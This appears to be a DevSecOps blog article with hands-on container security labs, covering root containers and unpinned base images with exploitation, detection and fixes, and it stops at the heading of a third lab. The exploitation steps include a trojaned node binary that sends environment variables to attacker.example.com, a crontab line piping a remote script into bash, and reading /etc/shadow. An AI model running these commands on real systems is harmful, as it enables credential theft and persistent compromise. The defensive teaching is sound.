DevSecOps Guides

Container Security Labs in 2026

Container Vulnerabilities and Security Misconfiguration with exploitation and mitigation techniques.

Reza
Feb 27, 2026

Another week, another article, another round of knowledge sharing.

We put together 42 container security labs that cover the most common misconfigurations in Docker and Kubernetes environments. Each lab walks through a real vulnerable configuration, shows the step-by-step exploitation path, explains the root cause, and provides a working fix with verification commands.

The labs cover Docker image hardening, runtime security, Kubernetes pod and cluster security, RBAC, network policies, secrets management, container registries, CI/CD pipeline security, and supply chain integrity. Every example uses real Dockerfiles, Kubernetes YAML manifests, and commands you can run against your own environments.

This is a hands-on reference built for penetration testers, security engineers, and platform teams. We show the vulnerable configuration, walk through exactly how an attacker exploits it, and give you the detection and remediation steps.


Running Containers as Root

By default, Docker containers run processes as root (UID 0). This means if an attacker escapes the container or exploits a vulnerability in the application, they gain root-level access to the container filesystem and potentially the host. In Kubernetes and Docker alike, this is the single most common misconfiguration we encounter during assessments.

The impact is straightforward: a web application vulnerability that would normally give an attacker limited shell access instead gives them full control. They can install packages, modify system files, read /etc/shadow, and, in worst-case scenarios with additional misconfigurations, pivot to the host. CVE-2019-5736 demonstrated how a root process inside a container could overwrite the host runc binary and gain host-level code execution. The Tesla cryptojacking incident in 2018 also involved containers running as root with exposed dashboards.

Running as non-root is a baseline control. Every container image should define a non-root user, and every deployment should enforce it.

Root Cause Analysis

When a Dockerfile has no USER directive, the default user is root. Many official base images ship without a non-root user configured, so unless the image author explicitly creates one, every process in the container inherits UID 0. Developers often skip this step because their application “works” as root during local testing, and nothing in the default Docker configuration warns them.
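The missing directive is easy to spot mechanically. A rough sketch (`last_user` is our own helper, not a standard tool; the linters in the Detection section do this properly):

```shell
# Print the effective user a Dockerfile ends with: the last USER
# directive wins, and no USER directive at all means root.
last_user() {
  awk 'toupper($1)=="USER" {u=$2} END {print (u=="" ? "root (default)" : u)}' "$1"
}
```

Run against the vulnerable Dockerfile below, it prints `root (default)`.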

Vulnerable Configuration

FROM node:20-slim

WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
COPY . .

EXPOSE 3000
CMD ["node", "server.js"]

This container runs node server.js as root. Verify with:

docker build -t myapp-vuln .
docker run --rm myapp-vuln whoami
# Output: root
docker run --rm myapp-vuln id
# Output: uid=0(root) gid=0(root) groups=0(root)

Exploitation

We start from a position where we have RCE inside the running container (via an application vulnerability such as SSRF, command injection, or deserialization).

Step 1: Confirm root access

docker run --rm -it myapp-vuln sh
id

Expected output:

uid=0(root) gid=0(root) groups=0(root)

Step 2: Read sensitive system files

cat /etc/shadow

Expected output:

root:*:19770:0:99999:7:::
daemon:*:19770:0:99999:7:::
bin:*:19770:0:99999:7:::
...

As root, we can read password hashes in any container that stores local users.

Step 3: Install backdoor packages

apt-get update && apt-get install -y nmap netcat-openbsd socat

Expected output:

Reading package lists... Done
Setting up nmap (7.93+dfsg1-1) ...
Setting up netcat-openbsd (1.219-1) ...

As root, package installation succeeds. A non-root user would get permission denied.

Step 4: Modify application binaries

cp /usr/local/bin/node /usr/local/bin/node.orig
cat > /usr/local/bin/node << 'EOF'
#!/bin/bash
curl -s http://attacker.example.com/exfil -d "$(env)" >/dev/null 2>&1 &
exec /usr/local/bin/node.orig "$@"
EOF
chmod +x /usr/local/bin/node

Every future invocation of node now exfiltrates environment variables.

Step 5: Write cron persistence

echo '* * * * * root curl http://attacker.example.com/shell.sh | bash' >> /etc/crontab

Step 6: CVE-2019-5736 attack vector (runc overwrite)

This CVE allows a root process inside a container to overwrite the host runc binary. The attack works by:

# Inside the container as root
# Overwrite /proc/self/exe (which points to runc during exec)
# This is the simplified concept -- the actual exploit uses a specially crafted binary
cp /proc/self/exe /tmp/runc-backup
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
# This payload executes on the HOST after runc is overwritten
cat /etc/shadow > /tmp/host-shadow
EOF

The full exploit (CVE-2019-5736) works against runc versions through 1.0-rc6 (patched in the runc shipped with Docker 18.09.2). Running as non-root blocks this attack entirely because the process lacks permission to overwrite the runc binary via /proc/self/exe.

Detection

Hadolint (Dockerfile linting)

hadolint Dockerfile

Expected output when the last USER directive is root (DL3002 does not fire on a Dockerfile with no USER directive at all; use Dockle below for that case):

Dockerfile:8 DL3002 warning: Last USER should not be root

Dockle (image linting)

dockle myapp-vuln

Expected output:

WARN  - CIS-4.1  : Create a user for the container
      - Last user should not be root

Docker inspect at runtime

docker inspect --format '{{.Config.User}}' myapp-vuln

Expected output (empty means root):


An empty string confirms no user is set, meaning the container runs as root.

Check running containers

docker ps -q | xargs -I{} docker inspect --format '{{.Name}} -> User: {{.Config.User}}' {}

This lists every running container and its configured user. Any blank entry runs as root.

Solution

Create a dedicated user in the Dockerfile and switch to it before the CMD instruction. For runtime enforcement, use the --user flag or user: directive in Compose.

Fixed Configuration

FROM node:20-slim

RUN groupadd --gid 1001 appgroup && \
    useradd --uid 1001 --gid appgroup --shell /bin/false --create-home appuser

WORKDIR /app
COPY --chown=appuser:appgroup package*.json ./
RUN npm ci --only=production
COPY --chown=appuser:appgroup . .

USER appuser

EXPOSE 3000
CMD ["node", "server.js"]

Runtime enforcement via docker run:

docker run --rm --user 1001:1001 myapp whoami
# Output: appuser

Runtime enforcement via docker-compose.yml:

services:
  app:
    image: myapp
    user: "1001:1001"
    security_opt:
      - no-new-privileges:true

The USER directive sets the default user for all subsequent RUN, CMD, and ENTRYPOINT instructions. The --chown flag on COPY ensures files are owned by the non-root user so the application can still read them. The runtime --user flag acts as a second layer of defense regardless of what the Dockerfile specifies.
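The same control carries over to Kubernetes: a pod spec can enforce non-root execution regardless of what the image says. A minimal sketch (pod and image names are placeholders; the UID matches the appuser created above):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
    - name: app
      image: myapp
      securityContext:
        runAsNonRoot: true      # kubelet refuses to start a container running as UID 0
        runAsUser: 1001
        runAsGroup: 1001
        allowPrivilegeEscalation: false
```

With runAsNonRoot set, the kubelet rejects the container at admission time if it would run as root, so the control holds even if someone ships an image without a USER directive.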

Verification

Verify the rebuilt image runs as non-root

docker build -t myapp-fixed .
docker run --rm myapp-fixed id

Expected output:

uid=1001(appuser) gid=1001(appgroup) groups=1001(appgroup)

Verify with docker inspect

docker inspect --format '{{.Config.User}}' myapp-fixed

Expected output:

appuser

Verify root operations are denied

docker run --rm myapp-fixed apt-get update

Expected output:

Reading package lists... Done
E: Could not open lock file /var/lib/apt/lists/lock - open (13: Permission denied)

Verify /etc/shadow is unreadable

docker run --rm myapp-fixed cat /etc/shadow

Expected output:

cat: /etc/shadow: Permission denied

Verify hadolint passes

hadolint Dockerfile

Expected output: no warnings about root user.


Using Unversioned or Latest Base Images

Using latest or untagged base images means every build can pull a different underlying image. Today your FROM node:latest resolves to Node 20.11.0 on Debian Bookworm. Tomorrow it might resolve to Node 22 on a different base OS. You have no control and no reproducibility. This is a supply chain risk.

The real-world impact goes beyond broken builds. An attacker who compromises an upstream image tag can inject malicious code into every downstream build that pulls that tag. The event-stream incident and the Codecov bash uploader compromise both demonstrated how supply chain attacks propagate through mutable references. The ua-parser-js npm hijack in 2021 similarly showed how a single compromised dependency can cascade to millions of users. With Docker images, the attack surface is the entire operating system and runtime.

Pinning to a digest (SHA256 hash) guarantees you pull the exact image bytes you tested. Tags are mutable pointers; digests are immutable content addresses.

Root Cause Analysis

Docker tags are mutable. A registry maintainer can push a new image to the same tag at any time, and docker pull will fetch the latest version associated with that tag. The latest tag is just a convention -- it has no special behavior other than being the default when no tag is specified. Even pinning to node:20.11.0 is not fully deterministic because a maintainer can overwrite that tag. Only the image digest is immutable.
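The immutability claim is just content addressing: a digest is the SHA-256 of the manifest bytes, so identical bytes always resolve to the same digest and any modification yields a new one. A toy sketch, with a fake manifest standing in for the real thing:

```shell
# Toy illustration of content addressing: hash some "manifest" bytes
# the same way a registry derives an image digest.
manifest='{"schemaVersion":2,"layers":[]}'
digest() { printf '%s' "$1" | sha256sum | cut -d' ' -f1; }

d1=$(digest "$manifest")
d2=$(digest "$manifest")
d3=$(digest "${manifest}x")   # one extra byte: completely different digest

echo "sha256:$d1"
[ "$d1" = "$d2" ]   # same bytes, same digest -- reproducible
[ "$d1" != "$d3" ]  # any change, new digest -- tamper-evident
```

A tag, by contrast, is a row in a registry database that anyone with push access can repoint.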

Vulnerable Configuration

FROM node

WORKDIR /app
COPY . .
RUN npm ci
CMD ["node", "index.js"]

Or with the explicit latest tag, which behaves identically:

FROM node:latest

WORKDIR /app
COPY . .
RUN npm ci
CMD ["node", "index.js"]

Check what you actually pulled:

docker pull node:latest
docker inspect node:latest | jq -r '.[0].RepoDigests'
# The digest changes every time the upstream pushes a new image

Exploitation

This attack demonstrates how mutable tags allow silent supply chain compromise.

Step 1: Show current digest for latest tag

docker pull node:latest
docker inspect --format='{{index .RepoDigests 0}}' node:latest

Expected output:

node@sha256:a1b2c3d4e5f6... (some digest)

Step 2: Wait and pull again to show tag mutability

# Remove local cache
docker rmi node:latest

# Pull again (after upstream publishes new image)
docker pull node:latest
docker inspect --format='{{index .RepoDigests 0}}' node:latest

The digest will differ if the upstream has pushed an update. The tag latest now points to entirely different image contents.

Step 3: Use crane to inspect tag mutability without pulling

# Install crane: https://github.com/google/go-containerregistry/releases
crane digest node:latest

Expected output:

sha256:7f3a8e... (current digest)

Run this a week later and the digest changes. The tag is a moving target.

Step 4: Compare what two developers actually built

# Developer A built the image last week
docker build -t myapp:dev-a .
docker inspect --format='{{.RootFS.Layers}}' myapp:dev-a | wc -w
# 8 layers

# Developer B builds today after upstream update
docker build --no-cache -t myapp:dev-b .
docker inspect --format='{{.RootFS.Layers}}' myapp:dev-b | wc -w
# 9 layers -- different base, different OS packages, different vulnerabilities

Step 5: Show different vulnerability surfaces

trivy image myapp:dev-a --severity HIGH,CRITICAL --quiet
# Total: 12 (HIGH: 9, CRITICAL: 3)

trivy image myapp:dev-b --severity HIGH,CRITICAL --quiet
# Total: 27 (HIGH: 21, CRITICAL: 6)
# Completely different CVE set because the base OS changed

The same Dockerfile produces images with different vulnerability profiles on different days. Production is running a version nobody tested.

Step 6: Demonstrate a poisoned tag scenario

# An attacker pushes a malicious image to a public registry under a typosquatted name
# e.g., "nodje" instead of "node"
# FROM nodje:latest  <-- developer typo pulls attacker-controlled image

# Even on legitimate registries, a compromised maintainer account can push to existing tags
crane manifest node:20-slim | jq '.config.digest'
# This digest is what you trust. Without pinning, you trust whatever the tag resolves to.

Detection

Hadolint (Dockerfile linting)

hadolint Dockerfile

Expected output:

Dockerfile:1 DL3007 warning: Using latest is not allowed

Rule DL3007 fires on FROM image:latest or FROM image (implicit latest).

Hadolint with pinning rules

hadolint --strict Dockerfile

Expected output:

Dockerfile:1 DL3006 warning: Always tag the version of an image explicitly
Dockerfile:1 DL3007 warning: Using latest is not allowed

Trivy (scan for known CVEs in unpinned image)

trivy image node:latest --severity CRITICAL

Expected output:

node:latest (debian 12.4)
===========================
Total: 14 (CRITICAL: 14)

┌──────────────────┬────────────────┬──────────┐
│     Library      │ Vulnerability  │ Severity │
├──────────────────┼────────────────┼──────────┤
│ libssl3          │ CVE-2024-XXXXX │ CRITICAL │
│ ...              │ ...            │ ...      │
└──────────────────┴────────────────┴──────────┘

Docker Scout

docker scout cves node:latest --only-severity critical,high

Check existing images for digest pinning

# Grep Dockerfiles in your repo for unpinned bases
grep -rn "^FROM " */Dockerfile | grep -v "@sha256:"

This lists every Dockerfile that does not pin to a digest.
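That grep generalizes into a CI gate. A sketch, assuming GNU grep; `check_pinning` is a name we made up:

```shell
# Fail the build when any Dockerfile under the given directory uses a
# base image that is not pinned to a @sha256: digest.
check_pinning() {
  unpinned=$(grep -rn --include='Dockerfile*' '^FROM ' "$1" | grep -v '@sha256:')
  if [ -n "$unpinned" ]; then
    echo "Unpinned base images:"
    echo "$unpinned"
    return 1
  fi
}
```

Run it as the first step of the pipeline: `check_pinning . || exit 1`.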

Solution

Pin base images to a specific version tag and, for production workloads, pin to the image digest. Use docker pull to get the digest of a known-good image and reference it directly.

Fixed Configuration

Good -- pinned to version tag:

FROM node:20.11.0-slim

WORKDIR /app
COPY . .
RUN npm ci --only=production
CMD ["node", "index.js"]

Better -- pinned to digest:

FROM node:20.11.0-slim@sha256:bf0ef0687ffbd6c7a4a49e3e4a1e00e8e0d8f3a2e24c0b1c3cb27e3f6c8a0f12

WORKDIR /app
COPY . .
RUN npm ci --only=production
CMD ["node", "index.js"]

Get the digest of your current image:

docker inspect --format='{{index .RepoDigests 0}}' node:20.11.0-slim

Or with crane:

crane digest node:20.11.0-slim
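The lookup and rewrite can be combined. A sketch (`pin_base` is a hypothetical helper; GNU sed assumed; the digest argument defaults to a live crane lookup but can be supplied directly):

```shell
# Rewrite "FROM <image>" to "FROM <image>@<digest>" in a Dockerfile.
# Usage: pin_base Dockerfile node:20.11.0-slim [sha256:...]
pin_base() {
  file=$1; image=$2
  digest=${3:-$(crane digest "$image")}  # resolve via crane unless given
  sed -i "s|^FROM ${image}\$|FROM ${image}@${digest}|" "$file"
}
```

Re-run it whenever you intentionally bump the base image; the Dockerfile diff then shows exactly which digest changed and when.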

Verification

Confirm digest is pinned in Dockerfile

grep "^FROM" Dockerfile

Expected output:

FROM node:20.11.0-slim@sha256:bf0ef0687ffbd6c7a4a49e3e4a1e00e8e0d8f3a2e24c0b1c3cb27e3f6c8a0f12

Confirm hadolint no longer warns

hadolint Dockerfile

Expected output: no DL3006 or DL3007 warnings.

Confirm reproducibility

docker build -t myapp:build1 .
docker build --no-cache -t myapp:build2 .
diff <(docker inspect myapp:build1 | jq '.[0].RootFS') \
     <(docker inspect myapp:build2 | jq '.[0].RootFS')

Expected output: the leading base layers in both lists are identical because the digest is pinned. Layers created by RUN steps can still differ between --no-cache builds (file timestamps change), so compare the base layers at the top of each list rather than expecting an empty diff.

Verify with crane that digest matches

crane digest node:20.11.0-slim
# Compare this against the digest in your Dockerfile -- they should match


Secrets Exposed via ENV and ARG in Dockerfiles
